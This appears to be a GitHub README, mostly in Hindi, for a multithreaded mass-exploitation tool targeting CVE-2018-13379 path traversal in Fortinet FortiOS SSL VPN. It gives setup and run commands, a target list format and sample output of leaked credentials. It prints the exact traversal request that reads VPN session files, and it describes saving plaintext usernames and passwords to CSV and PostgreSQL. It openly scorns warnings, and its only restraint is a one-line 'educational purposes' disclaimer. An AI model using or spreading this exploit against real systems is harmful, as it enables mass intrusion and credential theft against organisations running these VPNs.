
CVE-2018-13379 फोर्टिनेट फोर्टिओएस एसएसएल वीपीएन के लिए बड़े पैमाने पर शोषण उपकरण। क्रेडेंशियल्स को तुरंत निकालता है, सीएसवी + पोस्टग्रेएसक्यूएल में सहेजता है। मल्टी-थ्रेडेड, कोई बकवास चेतावनी नहीं।

Fortinet FortiOS SSL VPN में CVE-2018-13379 (पथ भ्रमण) भेद्यता के बड़े पैमाने पर शोषण के लिए एक उपकरण। सत्र फ़ाइलों को पढ़ने और लॉगिन और पासवर्ड को स्पष्ट पाठ में निकालने की अनुमति देता है।
/remote/fgt_lang endpoint के माध्यम से CVE-2018-13379 का शोषणfortios_creds_20250120_143052)git clone https://github.com/Instructor-Admin/Multi-threaded-mass-exploiter-CVE-2018-13379-POC.git
cd Multi-threaded-mass-exploiter-CVE-2018-13379-POC
pip3 install requests psycopg2-binary
सभी सेटिंग्स सीधे स्क्रिप्ट में संपादन योग्य हैं - कमांड लाइन आर्गुमेंट्स लाइनों से कोई छेड़छाड़ नहीं:
TARGETS_FILE = "targets.txt" # File with targets (ip:port)
CSV_FILE = "fortios_creds.csv" # Output CSV file
PG_HOST = "127.0.0.1"
PG_PORT = 5432
PG_DB = "fortios_db"
PG_USER = "postgres"
PG_PASSWORD = "password"
THREADS = 20
TIMEOUT = 8
targets.txt बनाएँ, प्रति पंक्ति एक:192.168.1.1:8443
10.0.0.5:10443
172.16.0.1:443
python3 exploit.py
fortios_creds_YYYYMMDD_HHMMSS)उदाहरण आउटपुट:
[+] 100 targets loaded. We're running in 20 threads...
[+] LEAKED: 192.168.1.1:8443
→ Pulled 3 credentials
Wrote 3 credentials to CSV
3 credentials entered into the DB
[-] Not leaky: 10.0.0.1:10443
https://ip:port/remote/fgt_lang?lang=/../../../..///////////dev/cmdb/sslvpn_websession पते पर GET अनुरोध भेजा जाता हैvar fgt_lang है (भेद्यता का संकेत)username और password जोड़े निकाले जाते हैंrequestspsycopg2-binary (वैकल्पिक - इसके बिना केवल CSV फ़ाइलें काम करती हैं)urllib3यह उपकरण शैक्षिक उद्देश्यों और अधिकृत परीक्षण के लिए है। आप अपने कार्यों के लिए स्वयं जिम्मेदार हैं।
Unlicense - जो चाहे वो करें।